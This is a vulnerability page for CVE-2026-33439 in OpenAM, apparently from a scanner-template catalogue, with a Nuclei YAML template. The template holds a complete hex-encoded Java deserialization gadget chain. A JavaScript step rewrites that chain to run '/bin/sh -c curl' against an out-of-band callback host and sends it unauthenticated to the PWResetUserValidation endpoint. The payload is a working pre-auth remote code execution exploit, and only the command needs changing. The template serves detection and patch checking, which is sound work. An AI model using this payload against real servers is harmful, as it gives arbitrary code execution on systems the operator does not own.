OpenAM <= 16.0.5 - Pre-Auth RCE via jato.clientSession Deserialization
CVE-2026-33439
Early Release
Description
Open Access Management (OpenAM) is an access management solution. Prior to 16.0.6, OpenIdentityPlatform OpenAM is vulnerable to pre-authentication Remote Code Execution (RCE) via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypasses the WhitelistObjectInputStream mitigation that was applied to the jato.pageSession parameter after CVE-2021-35464. This vulnerability is fixed in 16.0.6.
Severity
Critical
CVSS Score
9.8
Exploit Probability
8%
Affected Product
openam
Published Date
April 14, 2026
Template Author
dhiyaneshdk
CVE-2026-33439.yaml
id: CVE-2026-33439
info:
name: OpenAM <= 16.0.5 - Pre-Auth RCE via jato.clientSession Deserialization
author: DhiyaneshDk
severity: critical
description: |
Open Access Management (OpenAM) is an access management solution. Prior to 16.0.6, OpenIdentityPlatform OpenAM is vulnerable to pre-authentication Remote Code Execution (RCE) via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypasses the WhitelistObjectInputStream mitigation that was applied to the jato.pageSession parameter after CVE-2021-35464. This vulnerability is fixed in 16.0.6.
impact: |
An unauthenticated attacker can achieve arbitrary command execution on the server by sending a crafted serialized Java object as the jato.clientSession GET/POST parameter to any JATO ViewBean endpoint whose JSP contains <jato:form> tags (e.g., the Password Reset pages).
remediation: Upgrade to OpenAM 16.0.6 or later.
reference:
- https://www.hacktron.ai/blog/openam-deserialization-pre-auth-rce
- https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-33439
epss-score: 0.07964
epss-percentile: 0.92082
cwe-id: CWE-502
metadata:
verified: true
max-request: 2
vendor: openidentityplatform
product: openam
shodan-query: http.title:"OpenAM"
fofa-query: title="OpenAM"
tags: cve,cve2026,openam,deserialization,rce,jato,oast,oob
flow: http(1) && javascript(1)
http:
- method: GET
path:
- "{{BaseURL}}/openam/ui/PWResetUserValidation"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "OpenAM","tfUserAttr")'
condition: and
internal: true
javascript:
- code: |
var net = require('nuclei/net');
var P = "aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b787000000002737200306f72672e6170616368652e636c69636b2e636f6e74726f6c2e436f6c756d6e24436f6c756d6e436f6d70617261746f72000000000000000102000249000d617363656e64696e67536f72744c0006636f6c756d6e7400214c6f72672f6170616368652f636c69636b2f636f6e74726f6c2f436f6c756d6e3b7870000000007372001f6f72672e6170616368652e636c69636b2e636f6e74726f6c2e436f6c756d6e00000000000000010200135a00086175746f6c696e6b5a000a65736361706548746d6c4900096d61784c656e6774684c000a6174747269627574657374000f4c6a6176612f7574696c2f4d61703b4c000a636f6d70617261746f7271007e00014c000964617461436c6173737400124c6a6176612f6c616e672f537472696e673b4c000a646174615374796c657371007e00074c00096465636f7261746f727400244c6f72672f6170616368652f636c69636b2f636f6e74726f6c2f4465636f7261746f723b4c0006666f726d617471007e00084c000b686561646572436c61737371007e00084c000c6865616465725374796c657371007e00074c000b6865616465725469746c6571007e00084c000d6d657373616765466f726d61747400194c6a6176612f746578742f4d657373616765466f726d61743b4c00046e616d6571007e00084c000872656e64657249647400134c6a6176612f6c616e672f426f6f6c65616e3b4c0008736f727461626c6571007e000b4c00057461626c657400204c6f72672f6170616368652f636c69636b2f636f6e74726f6c2f5461626c653b4c000d7469746c6550726f706572747971007e00084c0005776964746871007e000878700001000000007071007e000570707070707070707400106f757470757450726f7065727469657370707372001e6f72672e6170616368652e636c69636b2e636f6e74726f6c2e5461626c65000000000000000102001749000e62616e6e6572506f736974696f6e5a0009686f766572526f77735a00176e756c6c696679526f774c6973744f6e44657374726f7949000a706167654e756d6265724900087061676553697a65490013706167696e61746f724174746163686d656e745a000872656e6465724964490008726f77436f756e745a000a73686f7742616e6e65725a0008736f727461626c655a0006736f727465645a000f736f72746564417363656e64696e674c000763617074696f6e71007e00084c000a636f6c756d6e4c6973747400104c6a6176612f7574696c2f4c6973743b4c0007636f6c756d6e7371007e00074c000b636f6e74726f6c4c696e6b7400254c6f72672f6170616368652f636c69636b2f636f6e74726f6c2f416374696f6e4c696e6b3b4c000b636f6e74726f6c4c69737471007e00104c000c6461746150726f766964657274002c4c6f72672f6170616368652f636c69636b2f6461746170726f76696465722f4461746150726f76696465723b4c000668656967687471007e00084c0009706167696e61746f727400254c6f72672f6170616368652f636c69636b2f636f6e74726f6c2f52656e64657261626c653b4c0007726f774c69737471007e00104c000c736f72746564436f6c756d6e71007e00084c0005776964746871007e0008787200286f72672e6170616368652e636c69636b2e636f6e74726f6c2e4162737472616374436f6e74726f6c00000000000000010200094c000e616374696f6e4c697374656e65727400214c6f72672f6170616368652f636c69636b2f416374696f6e4c697374656e65723b4c000a6174747269627574657371007e00074c00096265686176696f727374000f4c6a6176612f7574696c2f5365743b4c000c68656164456c656d656e747371007e00104c00086c697374656e65727400124c6a6176612f6c616e672f4f626a6563743b4c000e6c697374656e65724d6574686f6471007e00084c00046e616d6571007e00084c0006706172656e7471007e00174c00067374796c657371007e0007787070707070707074000a64756d6d795461626c65707000000002000100000000000000000000000100000000000000000170737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a6578700000000077040000000078737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f400000000000007708000000100000000078737200236f72672e6170616368652e636c69636b2e636f6e74726f6c2e416374696f6e4c696e6b00000000000000010200015a0007636c69636b6564787200256f72672e6170616368652e636c69636b2e636f6e74726f6c2e41627374726163744c696e6b00000000000000010200075a000864697361626c65645a001372656e6465724c6162656c416e64496d616765490008746162696e6465784c0008696d61676553726371007e00084c00056c6162656c71007e00084c000a706172616d657465727371007e00074c00057469746c6571007e00087871007e001470707070707074001664756d6d795461626c652d636f6e74726f6c4c696e6b71007e0018700000000000007070707000707070707070707070770400000003737200296f72672e6170616368652e78616c616e2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000749000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465784c000b5f617578436c617373657374002a4c6f72672f6170616368652f78616c616e2f78736c74632f72756e74696d652f486173687461626c653b5b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00084c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff70757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e00200007870000003c8cafebabe00000041002907000201000b4f6f625472616e736c657407000401002f6f72672f6170616368652f78616c616e2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100083c636c696e69743e010003282956010004436f64650a0009000b07000a0100116a6176612f6c616e672f52756e74696d650c000c000d01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b07000f0100106a6176612f6c616e672f537472696e670800110100072f62696e2f73680800130100022d6308001501002a6375726c20687474703a2f2f5245504c4143454d455f4f4153545f504c414345484f4c4445525f55524c0a000900170c0018001901000465786563010028285b4c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b07001b0100136a6176612f6c616e672f5468726f7761626c6501000f4c696e654e756d6265725461626c6501000d537461636b4d61705461626c650100063c696e69743e0a000300200c001e00060100097472616e73666f726d010050284c6f72672f6170616368652f78616c616e2f78736c74632f444f4d3b5b4c6f72672f6170616368652f786d6c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b295601000a457863657074696f6e730700250100286f72672f6170616368652f78616c616e2f78736c74632f5472616e736c6574457863657074696f6e010073284c6f72672f6170616368652f78616c616e2f78736c74632f444f4d3b4c6f72672f6170616368652f786d6c2f64746d2f44544d417869734974657261746f723b4c6f72672f6170616368652f786d6c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b295601000a536f7572636546696c650100104f6f625472616e736c65742e6a6176610021000100030000000000040008000500060001000700000054000500000000001fb8000806bd000e590312105359041212535905121453b6001657a7000457b100010000001a001d001a0002001c0000000e000300000009001a000a001e000b001d0000000700025d07001a000001001e0006000100070000001d00010001000000052ab7001fb100000001001c000000060001000000060001002100220002002300000004000100240007000000190000000300000001b100000001001c0000000600010000000c0001002100260002002300000004000100240007000000190000000400000001b100000001001c0000000600010000000d000100270000000200287074000b4f6f625472616e736c6574707701007871007e002778";
var CMD_OFF = 5114; // "curl http://REPLACEME_OAST_PLACEHOLDER_URL" string start
var LEN_OFF = 5110; // CONSTANT_Utf8 length field (2 bytes, big-endian)
var ARR_OFF = 4660; // byte[] array length for the embedded class file (4 bytes, big-endian)
var OLD_LEN = 42; // Original placeholder string length in bytes
var OLD_ARR = 968; // Original class file size in bytes
var cmd = "curl http://" + interactsh;
var delta = cmd.length - OLD_LEN;
function h(s) {
var o = "";
for (var i = 0; i < s.length; i++) {
var c = s.charCodeAt(i).toString(16);
o += c.length < 2 ? "0" + c : c;
}
return o;
}
var newHex = h(cmd);
var oldHexLen = OLD_LEN * 2;
var px = P.substring(0, CMD_OFF) + newHex + P.substring(CMD_OFF + oldHexLen);
var ul = cmd.length.toString(16);
while (ul.length < 4) ul = "0" + ul;
px = px.substring(0, LEN_OFF) + ul + px.substring(LEN_OFF + 4);
var al = (OLD_ARR + delta).toString(16);
while (al.length < 8) al = "0" + al;
px = px.substring(0, ARR_OFF) + al + px.substring(ARR_OFF + 8);
var ba = [];
for (var i = 0; i < px.length; i += 2) {
ba.push(parseInt(px.substring(i, i + 2), 16));
}
var T = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var b = "";
for (var i = 0; i < ba.length; i += 3) {
var a0 = ba[i], a1 = i+1<ba.length?ba[i+1]:0, a2 = i+2<ba.length?ba[i+2]:0;
b += T[(a0>>2)&63];
b += T[((a0<<4)|(a1>>4))&63];
b += i+1<ba.length ? T[((a1<<2)|(a2>>6))&63] : "=";
b += i+2<ba.length ? T[a2&63] : "=";
}
var payload = b.split("+").join("-").split("/").join("_").split("=").join("");
var ct = (tport === "443") ? "tls" : "tcp";
var conn = net.Open(ct, thost + ":" + tport);
var req = "GET /openam/ui/PWResetUserValidation?jato.clientSession=" + payload +
" HTTP/1.1\r\nHost: " + thost + ":" + tport +
"\r\nConnection: close\r\n\r\n";
conn.SendHex(h(req));
var resp = conn.RecvString(4096);
conn.Close();
Export(resp);
args:
thost: "{{Host}}"
tport: "{{Port}}"
interactsh: "{{interactsh-url}}"
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
# digest: 490a004630440220593047ba0f8503286c1a9d24bcad19a42004a4710098665a5e4d2ec887faf4f502206cca5a349f451f2a3ea53a95ce55c082369fb64ff6ea1d3556c36fe9c8387062:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-33439
CWE ID:
cwe-502
Remediation Steps
Upgrade to OpenAM 16.0.6 or later.